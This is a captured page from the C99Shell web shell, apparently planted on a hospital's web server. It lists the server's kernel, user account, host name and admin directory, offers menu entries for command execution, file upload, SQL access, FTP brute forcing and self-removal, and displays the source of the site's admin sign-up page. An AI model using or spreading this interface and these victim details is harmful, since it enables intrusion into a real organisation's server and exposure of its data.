!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/home/katebhospital/public_html/admin/   drwxr-xr-x
Free 984.22 GB of 3519.75 GB (27.96%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     signup-admin.php (3.32 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE html>
<html>
<head>
    <link href="../assets/style.css" rel="stylesheet" />
    <link href="../assets/font-awesome.css" rel="stylesheet" />
    
    <title><?php include('title.php'?></title>
    <!-- Meta-Tags -->
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta charset="utf-8">
    <meta name="keywords" content="Sign Up Form">
    <style>
        body {
            background-image: url('../assets/img/hero-slider/slider-1.jpg');
            background-size: cover;
        }

        .background-overlay {
            background-color: rgba(0, 0, 0, 0.4); /* Adjust the color and opacity as needed */
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            z-index: -1;
        }
    </style>
    <script>
        addEventListener("load", function () {
            setTimeout(hideURLbar, 0);
        }, false);

        function hideURLbar() {
            window.scrollTo(0, 1);
        }
    </script>
    <link href="http://fonts.googleapis.com/css?family=Source+Sans+Pro:200,200i,300,300i,400,400i,600,600i,700,700i,900,900i&amp;subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel="stylesheet">
</head>
<body>
    <div class="background-overlay"></div>
    <div>
        <h1>Kateb Hospital Admin Panel - Sign Up</h1>
        <!--728x90-->
        <div class="clear-loading spinner">
            <span></span>
        </div>
        <!--728x90-->
        <div class="w3ls-login box box--big">
            <!-- form starts here -->
            <form method="post">

                <div class="agile-field-txt">
                    <label style="color: white; font-weight: bold;">Email</label>
                    <input type="text" name="email" placeholder="Enter Email" required="" />
                </div>
                <div class="agile-field-txt">
                    <label style="color: white; font-weight: bold;">Password</label>
                    <input type="password" name="password" placeholder="Enter Password" required="" id="myInput" />
                     </div>  
                <div class="agile-field-txt">
                    <label style="color: white; font-weight: bold;">Confirm Password</label>
                    <input type="password" name="password" placeholder="Enter Password" required="" id="myInput" />
                    <div class="agile_label">
                        <input id="check3" name="check3" type="checkbox" value="show password" onclick="myFunction()">
                        <label class="check" for="check3">Show password</label>
                    </div>
                   
                </div>
                <!-- script for show password -->
                <script>
                    function myFunction() {
                        var x = document.getElementById("myInput");
                        if (x.type === "password") {
                            x.type = "text";
                        } else {
                            x.type = "password";
                        }
                    }
                </script>
                <!-- //end script -->
                <input type="submit" name="submit" value="SIGN UP">
            </form>
        </div>
    </div>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0042 ]--